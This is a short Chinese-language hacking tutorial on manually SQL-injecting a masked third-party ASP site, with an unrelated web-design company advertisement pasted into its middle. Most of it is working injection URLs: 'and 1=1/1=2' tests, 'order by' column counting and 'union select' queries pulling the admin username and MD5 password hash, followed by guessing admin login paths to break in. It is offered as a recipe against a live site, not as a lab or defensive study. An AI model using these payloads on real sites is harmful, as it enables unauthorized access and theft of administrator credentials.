看到很多腳本小子，工具黨用啊D，明小子，穿山甲對網(wǎng)站掃來掃去，拿個后臺什么的，其實基礎是最重要的，今天我來說一下純手工注入一個站點。

創(chuàng)新互聯(lián)公司主營水磨溝網(wǎng)站建設的網(wǎng)絡公司,主營網(wǎng)站建設方案,重慶APP開發(fā)公司,水磨溝h5微信小程序搭建,水磨溝網(wǎng)站營銷推廣歡迎水磨溝等地區(qū)企業(yè)咨詢

目標網(wǎng)址:http://www.******.com/about.asp?id=1

1.首先確認這里是否存在整型注入，很簡單，url后加' and 1=1 and 1=2,不細說。同時我們還判斷出這是Access的數(shù)據(jù)庫。

2.利用order by判斷表項有幾個；

    http://www.******.com/about.asp?id=1 order by 4（這里的5報錯，4正確，就是4個了）

3.然后測試顯示位，2，3位可顯；

    http://www.******.com/about.asp?id=1 and 1=2 union select 1,2,3,4 from admin

4.在顯示位猜測字段值；這里的表名，字段名根據(jù)經(jīng)驗來試；常見的就那幾種；我們得到了用戶名和密碼（MD5加密的）；

    http://www.******.com/about.asp?id=1 and 1=2 union select 1,username,3,4 from admin
    http://www.******.com/about.asp?id=1 and 1=2 union select 1,password,3,4 from admin

5.拿到用戶名密碼后，尋找后臺，常見的admin/login/manager/admin_login等可以試一試，成功登陸，搞定。提權后面再說咯。